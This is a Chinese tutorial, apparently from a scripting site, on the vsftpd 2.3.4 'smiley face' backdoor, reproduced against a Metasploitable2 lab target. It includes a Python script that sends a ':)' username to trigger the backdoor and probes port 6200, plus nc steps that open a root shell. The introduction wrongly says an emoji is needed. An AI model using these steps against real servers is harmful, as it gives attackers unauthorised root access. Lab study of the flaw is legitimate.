Python脚本检测笑脸漏洞的问题复现
作者:TFIRE
Python脚本有效检测vsftpd2.3.4版本中的笑脸漏洞,该漏洞存在于6200端口,允许任何人连接,输入带有特定表情符号的用户名和任意密码即可触发,本文介绍了环境搭建、漏洞扫描和利用过程,通过nc命令演示了漏洞复现步骤
Python脚本检测笑脸漏洞
一、漏洞介绍
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“😃 ”,密码任意,因此也称为笑脸漏洞。
二、环境搭建
攻击机(本机):125.217.53.182
靶机(metaspolit2):192.168.126.129
namp漏洞扫描
我们发现21端口是打开的,而且版本也相对应,接下来我们使用python脚本进行漏洞检测
import socket from ftplib import FTP url = input("请输入你需要检测的地址:") ftp = FTP() username = 'root:)' #用户名必须包含:)这两个字符 password = 'anonymous' #密码随便啥都行 try: ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒 ftp.login(username,password) ftp.quit() except: print("完成登录检测") try: s = socket.socket() #使用socket函数来检测是否有漏洞存在 s.connect((url,6200)) s.close() print("存在微笑漏洞") except: print("没有发现笑脸漏洞!")
输入我们需要攻击的ip地址,
发现存在笑脸漏洞
三、漏洞复现
(一)使用nc进行漏洞利用
1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个密码回车等待,紧接着进行下一步:
2、打开一个新窗口,输入nc 目标ip 6200 即可连接。
复现完成
到此这篇关于Python脚本检测笑脸漏洞的文章就介绍到这了,更多相关Python脚本检测笑脸漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!